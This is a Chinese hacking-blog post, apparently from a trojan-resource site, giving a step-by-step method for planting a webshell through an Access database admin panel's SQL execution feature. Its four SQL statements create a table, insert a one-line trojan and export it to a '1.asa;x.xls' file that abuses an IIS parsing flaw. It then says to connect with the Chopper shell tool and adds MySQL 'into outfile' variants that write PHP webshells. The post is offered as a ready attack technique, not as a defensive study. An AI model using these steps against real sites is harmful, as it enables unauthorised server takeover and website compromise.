Access数据库SQL导出一句话拿webshell - 中国木马资源网

作者:admin2016-1-22 20:41分类: 黑客技术,黑客渗透网站文章 标签: access后台数据库拿shell

实用环境,在Access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了。
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。

至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

执行sql查询操作.jpg

逐一执行以下语句就可以导出一句话木马
第一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select * into [a] in 'e:\web\www.asp-muma.com\1.asa;x.xls' 'excel 4.0;' from cmd
第四句代码
drop table cmd

asa一句话木马.jpg

直接用菜刀连接:http://www.asp-muma.com/1.asa;x.xls


SQL语句意思解释:
第一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表

以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者
Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';
后台有执行SQL语句功能(vote为已知表段)
来源:asp大马官网 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/1532 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~